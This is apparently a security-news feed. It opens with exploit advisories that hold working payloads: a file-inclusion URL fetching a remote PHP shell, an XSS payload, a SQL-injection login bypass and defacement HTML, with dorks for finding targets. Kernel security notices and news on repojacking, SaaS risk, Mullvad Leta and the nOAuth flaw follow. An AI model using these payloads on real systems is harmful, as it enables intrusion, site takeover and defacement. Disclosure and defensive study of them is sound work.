Adult Video Script version 3.0 suffers from local and remote file inclusion vulnerabilities.

    ====================================================================================================================================| # Title     : Adult Video Script 3.0 RFI /LFI Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Download  : https://update.avscms.com/files/avscms-8.2-full.zip                                                                || # Dork      :  Powered by AVSCMS                                                                                                 |====================================================================================================================================P0C :[+] Dorking İn Google Or Other Search Enggine.[+] R/L File Inclusion :    Line      : 20 = include_once ('./lang/'.$lang_include);    Function  : include_once    Variables :$lang_include    C:\web\www\upload\siteadmin\editor_files\image.php[+] http://127.0.0.1/www/lustubecom/siteadmin/editor_files/image.php?lang_include=http://www.dcvi.net/r57.txt?Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        =======================================================================================================================================

Adult Video Script 3.0 File Inclusion

Adiscon LogAnalyzer version 4.1.5 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Adiscon LogAnalyzer V 4.1.5 Xss Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Telegram  : @indoushka                                                                                                         || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://loganalyzer.adiscon.com/                                                                                    |  | # Dork      : "Adiscon LogAnalyzer Version 4.1.5"                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : /login.php?referer=/userchange.php%3Fop%3Dchangeview%22%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E%26viewid%3DSYSLOG[+] http://127.0.0.1/rsyslog.infogeniecm/login.php?referer=/userchange.php%3Fop%3Dchangeview%22%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E%26viewid%3DSYSLOGGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

Adiscon LogAnalyzer 4.1.5 Cross Site Scripting

Adapt Inventory Management System version 1.0.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Adapt Inventory Management System 1.0.0 Auth By Pass Vulnerability                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/adapt-inventory-management-system/22838514?s_rank=7                                    |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload user & Pass : 1' or 1=1 -- -[+]  https://127.0.0.1/www/adaptinventory.com/demo/index.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |=======================================================================================================================================

Adapt Inventory Management System 1.0.0 SQL Injection

Active Newspaper version 2.0 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Active Newspaper v2.0 HTML inject Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://activeitzone.com/demo/newspaper_v2.0/                                                                      |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register new member .[+] go to edit your profil https://127.0.0.1/activeitzonecom/demo/newspaper_v2.0/home/profile[+] edit your profil , put your code or use this code for test in First Name case or Last Name or ...etc :<marquee><font color=lime size=32>Hacked by indoushka</font></marquee></tr><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a></tr>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |        =======================================================================================================================================

Active Newspaper 2.0 HTML Injection

Ubuntu Security Notice 6186-1 - Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in the netfilter subsystem of the Linux kernel when processing batch requests, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Gwangun Jung discovered that the Quick Fair Queueing scheduler implementation in the Linux kernel contained an out-of-bounds write vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6186-1  
June 22, 2023

linux-azure, linux-gcp, linux-ibm, linux-kvm, linux-oracle vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-azure: Linux kernel for Microsoft Azure Cloud systems  
- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-ibm: Linux kernel for IBM cloud systems  
- linux-kvm: Linux kernel for cloud environments  
- linux-oracle: Linux kernel for Oracle Cloud systems

Details:

Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in  
the netfilter subsystem of the Linux kernel when processing batch requests,  
leading to a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-32233)

Gwangun Jung discovered that the Quick Fair Queueing scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-31436)

Reima Ishii discovered that the nested KVM implementation for Intel x86  
processors in the Linux kernel did not properly validate control registers  
in certain situations. An attacker in a guest VM could use this to cause a  
denial of service (guest crash). (CVE-2023-30456)

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform data buffer size validation in some  
situations. A physically proximate attacker could use this to craft a  
malicious USB device that when inserted, could cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1380)

William Zhao discovered that the Traffic Control (TC) subsystem in the  
Linux kernel did not properly handle network packet retransmission in  
certain situations. A local attacker could use this to cause a denial of  
service (kernel deadlock). (CVE-2022-4269)

It was discovered that the io_uring subsystem in the Linux kernel did not  
properly perform file table updates in some situations, leading to a null  
pointer dereference vulnerability. A local attacker could use this to cause  
a denial of service (system crash). (CVE-2023-1583)

It was discovered that a race condition existed in the btrfs file system  
implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1611)

It was discovered that the Xircom PCMCIA network device driver in the Linux  
kernel did not properly handle device removal events. A physically  
proximate attacker could use this to cause a denial of service (system  
crash). (CVE-2023-1670)

It was discovered that the APM X-Gene SoC hardware monitoring driver in the  
Linux kernel contained a race condition, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or expose sensitive information (kernel memory).  
(CVE-2023-1855)

It was discovered that a race condition existed in the Xen transport layer  
implementation for the 9P file system protocol in the Linux kernel, leading  
to a use-after-free vulnerability. A local attacker could use this to cause  
a denial of service (guest crash) or expose sensitive information (guest  
kernel memory). (CVE-2023-1859)

It was discovered that a race condition existed in the Bluetooth HCI SDIO  
driver, leading to a use-after-free vulnerability. A local attacker could  
use this to cause a denial of service (system crash). (CVE-2023-1989)

It was discovered that the ST NCI NFC driver did not properly handle device  
removal events. A physically proximate attacker could use this to cause a  
denial of service (system crash). (CVE-2023-1990)

It was discovered that the SLIMpro I2C device driver in the Linux kernel  
did not properly validate user-supplied data in some situations, leading to  
an out-of-bounds write vulnerability. A privileged attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-2194)

It was discovered that the perf subsystem in the Linux kernel contained a  
use-after-free vulnerability. A privileged local attacker could possibly  
use this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-2235)

Jean-Baptiste Cayrou discovered that the shiftfs file system in the Ubuntu  
Linux kernel contained a race condition when handling inode locking in some  
situations. A local attacker could use this to cause a denial of service  
(kernel deadlock). (CVE-2023-2612)

It was discovered that a race condition existed in the TLS subsystem in the  
Linux kernel, leading to a use-after-free or a null pointer dereference  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-28466)

It was discovered that the Bluetooth subsystem in the Linux kernel did not  
properly initialize some data structures, leading to an out-of-bounds  
access vulnerability in certain situations. An attacker could use this to  
expose sensitive information (kernel memory). (CVE-2023-28866)

It was discovered that the DA9150 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-30772)

It was discovered that the Qualcomm EMAC ethernet driver in the Linux  
kernel did not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33203)

It was discovered that the BQ24190 charger driver in the Linux kernel did  
not properly handle device removal, leading to a user-after free  
vulnerability. A physically proximate attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2023-33288)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   linux-image-6.2.0-1003-ibm      6.2.0-1003.3  
   linux-image-6.2.0-1005-azure    6.2.0-1005.5  
   linux-image-6.2.0-1005-oracle   6.2.0-1005.5  
   linux-image-6.2.0-1006-kvm      6.2.0-1006.6  
   linux-image-6.2.0-1007-gcp      6.2.0-1007.7  
   linux-image-azure               6.2.0.1005.5  
   linux-image-gcp                 6.2.0.1007.7  
   linux-image-ibm                 6.2.0.1003.3  
   linux-image-kvm                 6.2.0.1006.6  
   linux-image-oracle              6.2.0.1005.5

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6186-1  
   CVE-2022-4269, CVE-2023-1380, CVE-2023-1583, CVE-2023-1611,  
   CVE-2023-1670, CVE-2023-1855, CVE-2023-1859, CVE-2023-1989,  
   CVE-2023-1990, CVE-2023-2194, CVE-2023-2235, CVE-2023-2612,  
   CVE-2023-28466, CVE-2023-28866, CVE-2023-30456, CVE-2023-30772,  
   CVE-2023-31436, CVE-2023-32233, CVE-2023-33203, CVE-2023-33288

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-azure/6.2.0-1005.5  
   https://launchpad.net/ubuntu/+source/linux-gcp/6.2.0-1007.7  
   https://launchpad.net/ubuntu/+source/linux-ibm/6.2.0-1003.3  
   https://launchpad.net/ubuntu/+source/linux-kvm/6.2.0-1006.6  
   https://launchpad.net/ubuntu/+source/linux-oracle/6.2.0-1005.5

Ubuntu Security Notice USN-6186-1

Ubuntu Security Notice 6185-1 - It was discovered that the TUN/TAP driver in the Linux kernel did not properly initialize socket data. A local attacker could use this to cause a denial of service. It was discovered that the Real-Time Scheduling Class implementation in the Linux kernel contained a type confusion vulnerability in some situations. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6185-1June 22, 2023linux-aws, linux-azure, linux-bluefield, linux-gcp, linux-gke,linux-gkeop, linux-ibm, linux-kvm, linux-oracle, linux-raspivulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-bluefield: Linux kernel for NVIDIA BlueField platforms- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the TUN/TAP driver in the Linux kernel did notproperly initialize socket data. A local attacker could use this to cause adenial of service (system crash). (CVE-2023-1076)It was discovered that the Real-Time Scheduling Class implementation in theLinux kernel contained a type confusion vulnerability in some situations. Alocal attacker could use this to cause a denial of service (system crash).(CVE-2023-1077)It was discovered that the ASUS HID driver in the Linux kernel did notproperly handle device removal, leading to a use-after-free vulnerability.A local attacker with physical access could plug in a specially crafted USBdevice to cause a denial of service (system crash). (CVE-2023-1079)It was discovered that the Xircom PCMCIA network device driver in the Linuxkernel did not properly handle device removal events. A physicallyproximate attacker could use this to cause a denial of service (systemcrash). (CVE-2023-1670)It was discovered that a race condition existed in the Xen transport layerimplementation for the 9P file system protocol in the Linux kernel, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (guest crash) or expose sensitive information (guestkernel memory). (CVE-2023-1859)Jose Oliveira and Rodrigo Branco discovered that the Spectre Variant 2mitigations with prctl syscall were insufficient in some situations. Alocal attacker could possibly use this to expose sensitive information.(CVE-2023-1998)It was discovered that the BigBen Interactive Kids' gamepad driver in theLinux kernel did not properly handle device removal, leading to a use-after-free vulnerability. A local attacker with physical access could plugin a specially crafted USB device to cause a denial of service (systemcrash). (CVE-2023-25012)It was discovered that a use-after-free vulnerability existed in the HFS+file system implementation in the Linux kernel. A local attacker couldpossibly use this to cause a denial of service (system crash).(CVE-2023-2985)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1051-ibm      5.4.0-1051.56   linux-image-5.4.0-1065-bluefield  5.4.0-1065.71   linux-image-5.4.0-1071-gkeop    5.4.0-1071.75   linux-image-5.4.0-1088-raspi    5.4.0-1088.99   linux-image-5.4.0-1093-kvm      5.4.0-1093.99   linux-image-5.4.0-1102-gke      5.4.0-1102.109   linux-image-5.4.0-1103-oracle   5.4.0-1103.112   linux-image-5.4.0-1104-aws      5.4.0-1104.112   linux-image-5.4.0-1107-gcp      5.4.0-1107.116   linux-image-5.4.0-1110-azure    5.4.0-1110.116   linux-image-aws-lts-20.04       5.4.0.1104.101   linux-image-azure-lts-20.04     5.4.0.1110.103   linux-image-bluefield           5.4.0.1065.60   linux-image-gcp-lts-20.04       5.4.0.1107.109   linux-image-gke                 5.4.0.1102.107   linux-image-gke-5.4             5.4.0.1102.107   linux-image-gkeop               5.4.0.1071.69   linux-image-gkeop-5.4           5.4.0.1071.69   linux-image-ibm                 5.4.0.1051.77   linux-image-ibm-lts-20.04       5.4.0.1051.77   linux-image-kvm                 5.4.0.1093.88   linux-image-oracle-lts-20.04    5.4.0.1103.96   linux-image-raspi               5.4.0.1088.118   linux-image-raspi2              5.4.0.1088.118After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6185-1   CVE-2023-1076, CVE-2023-1077, CVE-2023-1079, CVE-2023-1670,   CVE-2023-1859, CVE-2023-1998, CVE-2023-25012, CVE-2023-2985Package Information:   https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1104.112   https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1110.116   https://launchpad.net/ubuntu/+source/linux-bluefield/5.4.0-1065.71   https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1107.116   https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1102.109   https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1071.75   https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1051.56   https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1093.99   https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1103.112   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1088.99

Ubuntu Security Notice USN-6185-1

Many organizations are unwittingly exposing users of their code repositories to repojacking when renaming projects, a new study shows.

Millions of enterprise software repositories on GitHub are vulnerable to repojacking, a relatively simple kind of software supply chain attack where a threat actor redirects projects that are dependent on a particular repo to a malicious one instead.

The issue has to do with how GitHub handles dependencies when a GitHub user or organization changes the name of a project or transfers its ownership to another entity, researchers at Aqua Security said in a report this week.

**Name-Change Risks**

To avoid breaking code dependencies, GitHub creates a link between the original repo name and the new one so all projects that are dependent on the original repo get automatically redirected to the newly renamed one. However, if an organization fails to adequately protect the old username, an attacker could simply reuse it to create a trojanized version of the original repository so that any projects that relied on the repo will once again start downloading dependencies from it.

"When a repository owner changes their username, a link is created between the old name and the new name for anyone who downloads dependencies from the old repository," Aqua researchers said in a blog this week. "However, it is possible for anyone to create the old username and break this link."

Researchers at Aqua recently decided to investigate the prevalence of repositories on GitHub that are vulnerable to such repojacking, or dependency repository hijacking, as some security researchers refer to the threat.

**Widely Prevalent Issue**

What Aqua discovered was twofold: millions of such repositories — including those belonging to companies such as Google and Lyft — are present on GitHub; and tools are easily available to attackers to find these repos and hijack them. One of these tools is GHTorrent, a project that maintains a nearly complete record of all public events, such as commits and pull requests, on GitHub. Attackers can use GHTorrent to harvest the GitHub names of repositories that organization previously used. They can then register the repo under that old username, recreate the repository, and deliver malware to any project that uses it.

Any project that directly references a GitHub repository is vulnerable if the owner of the repository changes or deletes the username for their repository.

"We have presented a significant dataset that attackers can utilize to harvest the names of previous repositories belonging to organizations," says Yakir Kadkoda, security researcher at Aqua Nautilus.

"Organizations should not assume that their old organization names will remain undisclosed," warns Kadkoda. "It is crucial for them to claim and keep their old usernames on GitHub and scan GitHub URLs and references in their code to identify any repositories that could potentially be claimed by an attacker."

**Bypassing Protections**

Kadkoda says GitHub has attempted to address this issue by preventing the creation of usernames and repositories that were previously owned and now redirect to other projects. GitHub also implemented a mechanism several years ago to retire popular repository namespaces as a means of mitigating this threat. "However, several bypasses have been discovered in the past few years," he says. During Aqua's study, its researchers found several examples of repositories where the protection implemented by GitHub did not apply. "Therefore, users cannot fully rely on these defenses at this point," he says.

Aqua's blog pointed to a GitHub vulnerability that Checkmarx discovered last year as one example of the ways available to attackers to bypass GitHub's attempts to protect against repojacking. The flaw involved a mechanism called "popular repository namespace retirement" and affected all renamed usernames on GitHub, including over 10,000 packages on package managers such as Swift, Packagist, and Go. "Repojacking is a technique to hijack renamed repository URLs traffic and routing it to the attacker's repository by exploiting a logical flaw that breaks the original redirect," Checkmarx said in a report on the vulnerability. "A GitHub repository is vulnerable to repojacking when its creator decided to rename his username while the old username is available for registration."

Organizations can mitigate their exposure to the repojacking threat by scanning their code, repositories, and dependencies for GitHub links, Kadkoda says: "They should check if those links directly refer to GitHub projects or if there are redirects pointing to repositories under other usernames or repo names than the original links." In these instances, organizations should attempt to claim the available username to prevent attackers from doing so. "Additionally, organizations should always maintain their old usernames on GitHub," he says.

Millions of Repos on GitHub Are Potentially Vulnerable to Hijacking

By Waqas
The Mullvad Leta search engine is accessible exclusively to users with a paid Mullvad VPN account.
This is a post from HackRead.com Read the original post: Mullvad VPN Introduces Mullvad Leta: A Privacy-Focused Search Engine

**One notable advantage of Mullvad Leta is the absence of third-party tracking links in search results, providing users with a clean and private browsing experience.**

Mullvad the company behind Mullvad VPN has unveiled Leta, a privacy-focused search engine designed to complement their renowned VPN services. Leta is accessible exclusively to users with a paid Mullvad VPN account and offers a range of features aimed at improving user privacy.

By default, the **recently launched Mullvad Browser** comes equipped with the DuckDuckGo search engine; however, users can now enjoy an alternative option with Mullvad Leta. To access Leta, users can set it as their default search engine within the Mullvad Browser or directly visit leta.mullvad.net.

Operating as a proxy, Mullvad Leta utilizes the Google Search API to cache search results. This caching system enables the sharing of cached results among all users, thereby reducing costs and enhancing privacy. Importantly, Leta is a user-supported service and does not rely on advertising or the sale of user data.

To simplify usage, Mullvad offers a browser extension that eliminates the need for repeated logins. Once users set their account number in the browser settings, they can seamlessly access Mullvad Leta. Search results are cached for a period of 30 days to protect against correlation attacks and manage costs effectively, ensuring a degree of privacy, albeit with slightly delayed results.

According to the company’s blog post published on June 20th, 2023, each Mullvad account allows users to perform up to 100 direct searches per day, alongside unlimited access to cached searches. Additional searches beyond the daily limit will prompt Mullvad Leta to execute a Google query on behalf of the user, sharing only the search term while safeguarding the rest of their data.

One notable advantage of Mullvad Leta is the absence of third-party tracking links in search results, providing users with a clean and private browsing experience. This eliminates the common intrusive tracking mechanisms found on other search engines and reinforces the commitment to user privacy.

Mullvad VPN is known for protecting its customers’ privacy. For instance, on April 18th, 2023, Mullvad VPN’s Gothenburg office was raided by Swedish police with a search warrant to confiscate computers containing the personal data of VPN service clients.

However, Mullvad employees informed the police that they do not store any data of their customers, and confiscating computers would be considered a violation of Swedish law. The police were left with no option but to leave the premises without any confiscated devices or user data.

**Takeaway**

With the introduction of Mullvad Leta, Mullvad continues to prioritize online privacy by offering a privacy-focused search engine. The integration of Leta with its renowned VPN services empowers users to enhance their online security and take control of their digital footprint.

By combining Mullvad’s expertise in VPN technology with a privacy-centric search engine, users can enjoy an elevated level of privacy and security during their online activities.

1.  Almost Every Major Free VPN is a Glorified Data Farm
2.  Israeli firm buys ExpressVPN raising privacy concerns
3.  Mozilla VPN – Firefox private network VPN is finally arriving
4.  ProtonVPN launches Chrome and Firefox browser extensions
5.  VPN Privacy: Shielding Your Online Activities from Prying Eyes

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Mullvad VPN Introduces Mullvad Leta: A Privacy-Focused Search Engine

Software-as-a-service has its benefits, but abandoned SaaS integrations and idle data sharing introduce risk to the enterprise.

Macro trends such as the shift to cloud services, a growing remote (or hybrid) workforce, and heavy reliance on third-party partners and contractors mean organizations are working with more software-as-a-service (SaaS) applications than ever. It also means that attackers are taking advantage of the ubiquity of SaaS as they target insecure default configurations and weakly secured identities.

Over the past year, attackers have attempted to intercept OAuth tokens, bypass multifactor authentication schemes, and exploit misconfigured systems and applications to gain unauthorized access to business-critical applications, such as GitHub, Microsoft 365, Google Workspace, Slack, and Okta — to name a few.

In the new "2023 State of SaaS Security" report, researchers from Valence Threat Labs identified various ways SaaS usage exposes organizations to attack. The report findings are based on organizations that have deployed Valence Security’s SaaS security platform.

The upshot? Organizations have to do a better job of tracking abandoned applications, files, and user accounts.

*   Over half — 51% — of an organization's SaaS third-party integrations are inactive.
*   Most — 90% — of an average organization's shared assets (files and folders shared with external collaborators) have not been accessed for at least 90 days.
*   On average, 1 in 8 employee accounts are dormant (with the user no longer with the company, for example).
*   On average, 10% of an organization's shared integrations and data belong to ex-employees.

**More SaaS = More Risk**

SaaS has also evolved to be an ecosystem of interconnected applications sharing data and identities; they are no longer standalone single-function applications. But all of that integration is a problem because applications have too many privileges, and data sharing is out of control.

*   100% of organizations grant full read/write access to email, files, and calendar to at least one third-party tool or service.
*   There are 21 integrations per organization with tenant-wide access to company and employee data.
*   Files are shared with personal accounts 30% of the time.
*   There are 54 shared resources (files, folders, SharePoint sites) per employee, and 193,000 shared resources per company, on average. Most are sitting idle.

SaaS has its benefits, but abandoned SaaS integrations and idle data sharing introduce risk to the enterprise. Organizations should regularly remove unused integrations and revoke sharing to reduce the attack surface. Data shares should be automatically revoked after a certain time period (such as 30 days), and user accounts should be deactivated when they leave the company. Life cycle management is critical to ensure that existing business processes are not impacted when an employee leaves the company and that their account gets deactivated, the report states.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Growing SaaS Usage Means Larger Attack Surface

The "nOAuth" attack allows cross-platform spoofing and full account takeovers, and enterprises need to remediate the issue immediately, researchers warn.

Organizations that have implemented the "Log in with Microsoft" feature in their Microsoft Azure Active Directory environments could potentially be vulnerable to an authentication bypass that opens the door to online and cloud account takeovers.

According to researchers at Descope, who dubbed the attack "nOAuth," the issue is an authentication implementation flaw that affects multitenant OAuth applications in Azure AD, Microsoft's cloud-based identity and access management service. A successful attack gives a bad actor full run of a victim's accounts, with the ability to establish persistence, exfiltrate data, explore if lateral movement is possible, and so on.

"OAuth and OpenID Connect are open, popular standards which millions of Web properties already use," says Omer Cohen, CISO at Descope. "If 'Log in with Microsoft' is improperly implemented, several of these apps could be vulnerable to account takeover. Small businesses with fewer developer resources could especially be impacted."

**Inside the nOAuth Cyberattack Threat**

By way of background, OAuth is an open, token-based authorization framework that allows users to log into applications automatically, based on previous authentication to another trusted app. This is familiar to most people from the "Log in with Facebook" or "Log in with Google" options available on many e-commerce websites.

In the Azure AD environment, OAuth is used to help manage user access to external resources, such as Microsoft 365, the Azure portal, and thousands of other SaaS applications using OAuth apps.

"Azure Active Directory also manages internal resources like apps on your corporate intranet and any cloud apps developed by your own organization by providing authentications via OAuth, OIDC, and other standard protocols," according to the Descope analysis. In other words, it holds the keys to a lot of important corporate data.

The weakness allows bad actors to perform cross-platform spoofing simply by using an unwitting victim's email address to impersonate them, according to Descope's analysis on the issue, released this week.

"In usual OAuth and OpenID Connect implementations, the user’s email address is used as the unique identifier by applications," explained researchers at Descope. "However, in Microsoft Azure AD, the 'email' claim returned is mutable and unverified, so it cannot be trusted."

That means that anyone with malicious intent and a decent amount of platform knowledge can simply set up an Azure AD account, and arbitrarily change the email attribute under "Contact Information" in that account to control the email authentication claim.

"\[This\] allows the attacker to use 'Log in with Microsoft' with the email address of any victim they want to impersonate," the researchers explained. "They can take over victims' accounts on any app that uses 'email' claim as the unique identifier for Microsoft OAuth and does not validate that email address, completely bypassing authentication."

The attack flow is unnervingly simple:

1.  The attackers accesses their Azure AD account as an administrator.
2.  The attackers change the "email" attribute of their account used for authentication to the victim’s email address.
3.  Since Microsoft does not require the email change to be validated on Azure AD, the system merges the two accounts and gives the attackers access to the victim's environment.

**A Far-Ranging Authentication Weakness**

To better understand the scope of the problem, the Descope researchers created a nOAuth proof-of-concept (PoC) exploit and tested it "with a white-hat attack on hundreds of websites and applications to check if any of them were vulnerable," they said. "We found that quite a few of them were."

Amid the sitting ducks were a design app with millions of monthly users, a publicly traded customer experience company, a leading multicloud consulting provider, as well as several SMBs and early-stage startups.

"We also informed two authentication platform providers that were merging user accounts when 'Log in with Microsoft' was used on an existing user account," according to the report. "In this instance, merging the attacker account with a legitimate user account would hand full control over the user account to the attacker. As a result, all of their customers using 'Log in with Microsoft' would have been vulnerable."

These findings, according to the researchers, "are a drop in the ocean of the Internet," and there are likely many, many thousands of other users that could be affected.

Microsoft has always issued general guidance to users to not to use an email address as a unique identifier for authentication, but after Descope informed Microsoft of the breadth of the issue, the computing giant has revamped its Azure AD OAuth implementation guidance to include two new claims to use, and dedicated sections on claim verification.

"If your app uses 'Log in with Microsoft' and you handle authentication in-house, it’s critical that you check if you use the email claim returned by Azure AD as the unique identifier," Cohen notes. "If so, remediation steps should be taken to ensure the claim used as the unique identifier for the user is the 'sub' (Subject) claim to avoid potential exploitation."

**Incorrect OAuth Implementations Plague Businesses**

Incorrect implementations of OAuth have been coming to light at big businesses lately, showcasing a need for organizations to lock down this potentially damaging attack vector.

In March, for instance, flaws in the authorization system of the Booking.com website came to light that could have allowed attackers to take over user accounts and gain full visibility into their personal or payment-card data, as well as log in to accounts on the website's sister platform, Kayak.com.

And in May, a bug tracked as CVE-2023-28131 was found in the OAuth implementation of Expo, an open source framework for developing native mobile apps for iOS, Android, and other Web platforms using a single codebase. The flaw threatened the accounts of any users that used various and social media accounts to log in to an online service that uses the framework.

Cohen underscores that the OAuth standard and others like it are trustworthy and strong authentication approaches but that businesses need to make sure to work with cybersecurity and authentication experts when building them in.

"These standards are extremely complicated to work with," he says. "Authentication isn’t something you can just add on and check a box. Implementing these standards correctly is critical to the security of the application."

He adds, "If businesses chose to implement these standards in-house, then they must have regular pen testing and review of the implementation, or they can use an authentication platform that is built by security experts."

He stresses that the importance of this can't be understated, given that cybercriminals are actively looking for these types of weaknesses.

"These are very typical attack vectors exploited," Cohen notes. "Attackers use these to cause widespread harm."

He adds, "With the increase of organizations adopting cloud technologies and SaaS applications, identity is the new firewall. If user authentication is not well-designed, it doesn’t matter how secure the application is itself as you will leave the front door open to cyberattacks."

Tag

#google